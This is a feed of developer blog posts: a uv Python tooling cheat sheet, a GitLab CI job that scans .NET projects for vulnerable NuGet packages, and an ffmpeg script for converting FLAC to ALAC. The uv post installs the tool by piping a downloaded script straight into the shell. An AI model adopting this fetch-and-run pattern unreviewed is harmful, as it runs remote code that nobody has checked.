<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Andrey Krisanov</title>
    <description>The latest articles on DEV Community by Andrey Krisanov (@akrisanov).</description>
    <link>https://dev.to/akrisanov</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F676438%2Fbe8b716a-9c93-488a-a117-15142fe29622.jpeg</url>
      <title>DEV Community: Andrey Krisanov</title>
      <link>https://dev.to/akrisanov</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/akrisanov"/>
    <language>en</language>
    <item>
      <title>uv: Cargo-like Python Tool That Replaces pipx, pyenv, and more</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Wed, 10 Sep 2025 10:53:39 +0000</pubDate>
      <link>https://dev.to/akrisanov/uv-cargo-like-python-tool-that-replaces-pipx-pyenv-and-more-543m</link>
      <guid>https://dev.to/akrisanov/uv-cargo-like-python-tool-that-replaces-pipx-pyenv-and-more-543m</guid>
      <description>&lt;h2&gt;
  
  
  Overview
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;uv&lt;/code&gt; is an end-to-end solution for managing &lt;a href="https://docs.astral.sh/uv/guides/projects/" rel="noopener noreferrer"&gt;Python projects&lt;/a&gt;, &lt;a href="https://docs.astral.sh/uv/guides/tools/" rel="noopener noreferrer"&gt;command-line tools&lt;/a&gt;, &lt;a href="https://docs.astral.sh/uv/guides/scripts/" rel="noopener noreferrer"&gt;single-file scripts&lt;/a&gt;, and even &lt;a href="https://docs.astral.sh/uv/guides/install-python/" rel="noopener noreferrer"&gt;Python itself&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Think of it as Python’s Cargo: a unified, cross‑platform tool that’s fast, reliable, and easy to use.&lt;/p&gt;

&lt;p&gt;This post is not a deep introduction to uv — many excellent articles already exist; instead, it’s a concise cheat sheet for everyday use.&lt;/p&gt;

&lt;h2&gt;
  
  
  Installation &amp;amp; Updates
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install&lt;/span&gt;
curl &lt;span class="nt"&gt;-LsSf&lt;/span&gt; https://astral.sh/uv/install.sh | sh

&lt;span class="c"&gt;# Update&lt;/span&gt;
uv self update
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Managing Python Versions
&lt;/h2&gt;

&lt;p&gt;Instead of juggling tools like pyenv, mise, asdf, or OS‑specific hacks, you can simply use uv:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# List available versions&lt;/span&gt;
uv python list

&lt;span class="c"&gt;# Install Python 3.13&lt;/span&gt;
uv python &lt;span class="nb"&gt;install &lt;/span&gt;3.13
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Works the same across all OSes&lt;/li&gt;
&lt;li&gt;No admin rights required&lt;/li&gt;
&lt;li&gt;Independent of system Python&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can also use &lt;a href="https://github.com/jdx/mise" rel="noopener noreferrer"&gt;mise&lt;/a&gt; alongside uv if you prefer a global version manager.&lt;/p&gt;

&lt;h2&gt;
  
  
  Projects &amp;amp; Dependencies
&lt;/h2&gt;

&lt;p&gt;Initialize a new project (creates a pyproject.toml automatically):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv init myproject or &lt;span class="c"&gt;# uv init -p 3.13 --name myproject&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;myproject
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Sync dependencies (similar to &lt;code&gt;pip install -r requirements.txt&lt;/code&gt;, but faster and more reliable):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv &lt;span class="nb"&gt;sync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Add dependencies:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv add litestar
uv add pytest &lt;span class="nt"&gt;--dev&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Lock dependencies (generates a cross‑platform lockfile, like Pipfile.lock or poetry.lock):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv lock
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡 The lock file is cross-platform, so you can develop on Windows and deploy on Linux.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Fast Virtual Environments
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create &amp;amp; activate venv automatically&lt;/span&gt;
uv venv
&lt;span class="nb"&gt;source&lt;/span&gt; .venv/bin/activate

&lt;span class="c"&gt;# Or skip activation and run directly with uv:&lt;/span&gt;
uv run python app.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Scripts
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a new script&lt;/span&gt;
uv init &lt;span class="nt"&gt;--script&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# /// script
# requires-python = "&amp;gt;=3.13"
# dependencies = [
#     "requests",
# ]
# ///
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://akrisanov.com&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run single‑file scripts with automatic dependency installation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv run script.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡  On *nix, add &lt;code&gt;#!/usr/bin/env -S uv run&lt;/code&gt; (then &lt;code&gt;chmod +x&lt;/code&gt;) to automatically call &lt;code&gt;uv run&lt;/code&gt; for a script.&lt;/p&gt;
&lt;/blockquote&gt;
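A minimal sketch of that tip (the file name `hello.py` is illustrative; actually running the script still requires `uv` on your PATH):

```shell
# hypothetical example: a PEP 723 script made directly executable.
# The shebang hands the file to `uv run`, which installs the declared
# dependencies on the fly before executing it.
cat > hello.py <<'EOF'
#!/usr/bin/env -S uv run
# /// script
# requires-python = ">=3.13"
# dependencies = [
#     "requests",
# ]
# ///
import requests

print(requests.get("https://akrisanov.com"))
EOF
chmod +x hello.py
ls -l hello.py  # now runnable as ./hello.py
```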

&lt;h2&gt;
  
  
  Tools
&lt;/h2&gt;

&lt;p&gt;Install CLI tools globally, isolated from system Python:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;tool&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;ruff&lt;/span&gt; &lt;span class="c1"&gt;# replaces pipx
&lt;/span&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;tool&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;httpie&lt;/span&gt;

&lt;span class="n"&gt;uvx&lt;/span&gt; &lt;span class="n"&gt;httpie&lt;/span&gt; &lt;span class="c1"&gt;# a shortcut
&lt;/span&gt;
&lt;span class="c1"&gt;# --with [temp dependency] runs jupyter in the current project
# without adding it and its dependencies to the project
&lt;/span&gt;&lt;span class="n"&gt;uv&lt;/span&gt; &lt;span class="n"&gt;run&lt;/span&gt; &lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;jupyter&lt;/span&gt; &lt;span class="n"&gt;jupyter&lt;/span&gt; &lt;span class="n"&gt;notebook&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;💡 &lt;code&gt;uv run&lt;/code&gt; is fast enough that it implicitly re‑locks and re‑syncs the project each time, keeping your environment&lt;br&gt;
up to date automatically.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If you're developing a CLI tool, uv can help minimize the friction:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv init &lt;span class="nt"&gt;--package&lt;/span&gt; your_tool
uv tool &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;See the &lt;a href="https://docs.astral.sh/uv/concepts/tools/" rel="noopener noreferrer"&gt;tools documentation&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Replacing pip-tools
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv pip compile &lt;span class="c"&gt;# replaces pip-tools compile&lt;/span&gt;
uv pip &lt;span class="nb"&gt;sync&lt;/span&gt;    &lt;span class="c"&gt;# replaces pip-tools sync&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Building and publishing packages
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build a `.whl` package for PyPI&lt;/span&gt;
uv build
&lt;span class="c"&gt;# Upload your Python package to PyPI&lt;/span&gt;
uv publish
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Pre-commit hooks
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;uv run &lt;span class="nt"&gt;--with&lt;/span&gt; pre-commit-uv pre-commit run &lt;span class="nt"&gt;--all-files&lt;/span&gt;
pre-commit-uv
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  GitHub Actions
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="s"&gt;astral-sh/setup-uv&lt;/span&gt; &lt;span class="c1"&gt;# brings UV to GitHub Actions&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Docker
&lt;/h2&gt;

&lt;p&gt;Official Docker images provide uv and Python preinstalled:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;ghcr.io/astral-sh/uv:latest
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Also, check &lt;a href="https://hynek.me/articles/docker-uv/" rel="noopener noreferrer"&gt;Production-ready Python Docker Containers with uv&lt;/a&gt; by Hynek Schlawack.&lt;/p&gt;

&lt;h2&gt;
  
  
  Workspaces
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;uv&lt;/code&gt; supports organizing one or more packages into a &lt;a href="https://docs.astral.sh/uv/concepts/projects/workspaces/" rel="noopener noreferrer"&gt;workspace&lt;/a&gt; to manage them together.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Example&lt;/em&gt;: you might have a FastAPI web application alongside several libraries, all versioned and maintained as separate Python packages in the same Git repository.&lt;/p&gt;

&lt;p&gt;In a workspace, each package has its own &lt;code&gt;pyproject.toml&lt;/code&gt;, but the workspace shares a single lockfile, ensuring that the workspace operates with a consistent set of dependencies.&lt;/p&gt;
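A workspace root `pyproject.toml` might look like this (a minimal sketch; the package name `mylib` and the `packages/` layout are illustrative):

```toml
[project]
name = "myapp"
version = "0.1.0"
dependencies = ["mylib"]

# declare which directories belong to the workspace
[tool.uv.workspace]
members = ["packages/*"]

# resolve mylib from the workspace instead of PyPI
[tool.uv.sources]
mylib = { workspace = true }
```

Running `uv lock` at the root then produces the single shared lockfile.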

&lt;h2&gt;
  
  
  Things to Keep in Mind
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;uv sync&lt;/code&gt; respects &lt;code&gt;.python-version&lt;/code&gt;, but the &lt;code&gt;UV_PYTHON&lt;/code&gt; environment variable takes precedence&lt;/li&gt;
&lt;li&gt;Uses python‑build‑standalone, which can be slightly slower than system builds (~1–3%) and lacks CPU‑specific optimizations&lt;/li&gt;
&lt;li&gt;Cache size can grow large (a trade‑off for speed and reliability)&lt;/li&gt;
&lt;li&gt;Legacy projects may fail if they depended on pip’s older, looser dependency resolution rules&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Why uv Matters
&lt;/h2&gt;

&lt;p&gt;Python has always had a fragmented ecosystem of tools: pip, pip-tools, virtualenv, venv, pipx, pyenv, poetry, tox…&lt;/p&gt;

&lt;p&gt;With uv, we finally get something closer to Rust’s Cargo or JavaScript’s npm/pnpm: a single, consistent, cross‑platform tool for environments, dependencies, scripts, and tools — and it’s fast.&lt;/p&gt;

&lt;h2&gt;
  
  
  References &amp;amp; Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://docs.astral.sh/uv/concepts/projects/dependencies/#dependency-sources" rel="noopener noreferrer"&gt;Dependency Sources&lt;/a&gt;
— explains how uv resolves dependencies&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.pecar.me/uv-with-django" rel="noopener noreferrer"&gt;UV with Django&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://peps.python.org/pep-0723/" rel="noopener noreferrer"&gt;PEP 723 – Inline script metadata&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/astral-sh/uv/issues/5903" rel="noopener noreferrer"&gt;WIP: Using uv run as a task runner&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Additional Notes
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;While raw speed isn’t everyone’s priority, uv has shaved minutes off CI builds and container rebuilds — saving money and energy.&lt;/li&gt;
&lt;li&gt;Astral capitalized on a very promising project called &lt;a href="https://github.com/astral-sh/python-build-standalone" rel="noopener noreferrer"&gt;python-build-standalone&lt;/a&gt; and now maintains it. These are Python builds that work without installers.&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;a href="https://akrisanov.com/uv/" rel="noopener noreferrer"&gt;Originally published&lt;/a&gt; on akrisanov.com&lt;/p&gt;

</description>
      <category>python</category>
      <category>tooling</category>
      <category>uv</category>
    </item>
    <item>
      <title>Identifying Vulnerable Dependencies In .NET Projects</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Tue, 07 May 2024 00:00:00 +0000</pubDate>
      <link>https://dev.to/akrisanov/identifying-vulnerable-dependencies-in-net-projects-3lba</link>
      <guid>https://dev.to/akrisanov/identifying-vulnerable-dependencies-in-net-projects-3lba</guid>
      <description>&lt;p&gt;Some time ago, I was working in a company that was building a SaaS that was written in .NET. The code base was a decade old, and like many companies using Microsoft technologies, it had been through a few framework upgrades. The intent was to move to modern technologies and refactor outdated components, but the execution was rather poor. By the time I put on my engineering manager's hat, many of the NuGet packages in the solution were out of date and even deprecated.&lt;/p&gt;

&lt;p&gt;In Python and Go projects, I rely heavily on linting, static analysis, and formatting tools. Not having these essentials would make me and my teams less productive. So the first thing I did was understand what modern .NET brings to the table in this area. And I started by scanning the NuGet packages we use in all of our projects in a single solution for potential vulnerabilities.&lt;/p&gt;

&lt;p&gt;It turned out that developers could simply run &lt;code&gt;dotnet list package --vulnerable&lt;/code&gt; locally to keep an eye on security. But without automation, it's too easy to forget about that.&lt;/p&gt;

&lt;p&gt;My first local scan produced the following result:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...
Project `X.Infrastructure.Calendar` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   &amp;gt; System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Common` has no vulnerable packages given the current sources.
Project `X.Infrastructure.Currency` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   &amp;gt; System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

Project `X.Infrastructure.Locker` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   &amp;gt; System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Locker.Tests.Unit` has no vulnerable packages given the current sources.
The given project `X.Infrastructure.Pool` has no vulnerable packages given the current sources.
Project `X.Infrastructure.Repositories` has the following vulnerable packages
   [net6.0]:
   Top-level Package Requested Resolved Severity Advisory URL
   &amp;gt; System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc
                                                       High https://github.com/advisories/GHSA-98g6-xh36-x2p7

The given project `X.Infrastructure.Rules` has no vulnerable packages given the current sources.
...

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, there are several projects vulnerable to &lt;a href="https://devhub.checkmarx.com/cve-details/CVE-2022-41064/" rel="noopener noreferrer"&gt;CVE-2022-41064&lt;/a&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;.NET Framework System.Data.SqlClient versions prior to 4.8.5 and Microsoft.Data.SqlClient versions prior to 1.1.4 and 2.0.0 prior to 2.1.2 is vulnerable to Information Disclosure Vulnerability.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;To get rid of the issue, it's enough to upgrade the package:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;dotnet add package System.Data.SqlClient -v 4.8.6

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, how can developers prevent such situations? You already know the answer: automation!&lt;/p&gt;

&lt;p&gt;After sharing my observations with the team, I created a merge request with a new GitLab pipeline that runs for every open merge request and master branch.&lt;/p&gt;

&lt;p&gt;These are the changes in the &lt;code&gt;.gitlab-ci.yml&lt;/code&gt; manifest:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;stages:
  - security

vulnerable-dependencies:
  stage: security
  image: mcr.microsoft.com/dotnet/sdk:6.0-bullseye-slim
  before_script:
    - dotnet restore
  script:
    - dotnet list package --vulnerable 2&amp;gt;&amp;amp;1 | tee vulnerable-packages.log
    - &amp;gt;-
      if grep -qiw "critical\|high\|moderate\|low" vulnerable-packages.log; then
        echo "🚨 Found vulnerable packages";
        exit 1;
      fi
  artifacts:
    when: always
    expire_in: 12h
    paths:
      - vulnerable-packages.log
  only:
    - master
    - merge_requests
  tags:
    - docker

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The pipeline will fail if any of the projects in the solution have vulnerable packages. The downloadable log file contains the list of vulnerabilities and their severity.&lt;/p&gt;
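The severity check can be tried locally on a sample log before wiring it into CI (the log line below is illustrative):

```shell
# simulate a scan log containing a Moderate finding
printf '> System.Data.SqlClient 4.8.3 4.8.3 Moderate https://github.com/advisories/GHSA-8g2p-5pqh-5jmc\n' > vulnerable-packages.log

# the same case-insensitive, whole-word match the pipeline uses
if grep -qiw "critical\|high\|moderate\|low" vulnerable-packages.log; then
  echo "vulnerable packages found"  # CI would exit 1 here
else
  echo "no vulnerable packages"
fi
```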

&lt;p&gt;This way, the team is always aware of the state of the dependencies and can take action to fix them.&lt;/p&gt;

&lt;p&gt;References:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://devblogs.microsoft.com/nuget/how-to-scan-nuget-packages-for-security-vulnerabilities/" rel="noopener noreferrer"&gt;How to Scan NuGet Packages for Security Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
    </item>
    <item>
      <title>Convert Flac to Apple Lossless With FFmpeg</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Sun, 22 Oct 2023 22:17:02 +0000</pubDate>
      <link>https://dev.to/akrisanov/convert-flac-to-apple-lossless-with-ffmpeg-4mbn</link>
      <guid>https://dev.to/akrisanov/convert-flac-to-apple-lossless-with-ffmpeg-4mbn</guid>
      <description>&lt;p&gt;I'm a longtime Apple Music user. Most of my so-called music collection is on the streaming service. However, I occasionally buy rare or remastered releases ripped from CDs. These releases are usually in the FLAC format, which Apple Music doesn't support. But I've found an easy workaround that allows me to organize and play albums on the go.&lt;/p&gt;

&lt;p&gt;The centerpiece of the workaround is FFmpeg. So if you don't already have it installed, it's worth installing now:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;brew &lt;span class="nb"&gt;install &lt;/span&gt;ffmpeg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Homebrew Formula&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When the tool is ready to use, navigate to the folder containing the FLAC files and run the following script:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;for &lt;/span&gt;file &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;.flac&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;ffmpeg &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="nt"&gt;-acodec&lt;/span&gt; alac &lt;span class="nt"&gt;-vcodec&lt;/span&gt; copy &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="nb"&gt;basename&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; .flac&lt;span class="sb"&gt;`&lt;/span&gt;&lt;span class="s2"&gt;.m4a"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;mkdir &lt;/span&gt;flac&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nb"&gt;mkdir &lt;/span&gt;alac&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;for &lt;/span&gt;file &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;.flac&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;&lt;span class="nb"&gt;mv&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="s2"&gt;"flac/"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;for &lt;/span&gt;file &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;.m4a&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;&lt;span class="nb"&gt;mv&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span 
class="s2"&gt;"alac/"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Silly One-liner Converting FLAC to ALAC&lt;/em&gt;&lt;/p&gt;
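The same pipeline can be unrolled into a more readable multi-line script (a behavior-equivalent sketch; ffmpeg is only invoked when `.flac` files are actually present):

```shell
# Convert every FLAC file in the current directory to ALAC,
# then sort originals and conversions into separate folders.
mkdir -p flac alac
for file in *.flac; do
  [ -e "$file" ] || continue          # no matches: the glob stays literal, skip it
  base="$(basename "$file" .flac)"
  ffmpeg -i "$file" -acodec alac -vcodec copy "alac/$base.m4a"
  mv "$file" flac/
done
```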

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8RmCmfLi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.26.25.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8RmCmfLi--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.26.25.png" alt="" width="800" height="621"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Susumu Hirasawa – Siren [Limited Edition]&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The bash script converts the audio to the Apple Lossless format (&lt;code&gt;*.m4a&lt;/code&gt;) and moves the files to the &lt;code&gt;alac&lt;/code&gt; directory:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5j6x8Oy_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.27.10.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5j6x8Oy_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.27.10.png" alt="" width="800" height="763"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Finally, the &lt;code&gt;alac&lt;/code&gt; directory can be dragged to Apple Music to import the album and upload its tracks to the cloud.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NcQMu0YQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.27.41.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NcQMu0YQ--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-22-at-18.27.41.png" alt="" width="800" height="473"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;The Uploaded Album&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;👉 You probably wonder why this album has no Lossless icon in Apple Music. Well, it turns out the audio quality of the FLAC files wasn't on par with lossless. So make sure the releases you buy or rip have a proper audio codec and quality.&lt;/p&gt;

</description>
      <category>music</category>
      <category>apple</category>
    </item>
    <item>
      <title>Generating A Lockfile For Python Project Using Github Actions</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Thu, 12 Oct 2023 21:21:49 +0000</pubDate>
      <link>https://dev.to/akrisanov/generating-a-lockfile-for-python-project-using-github-actions-275d</link>
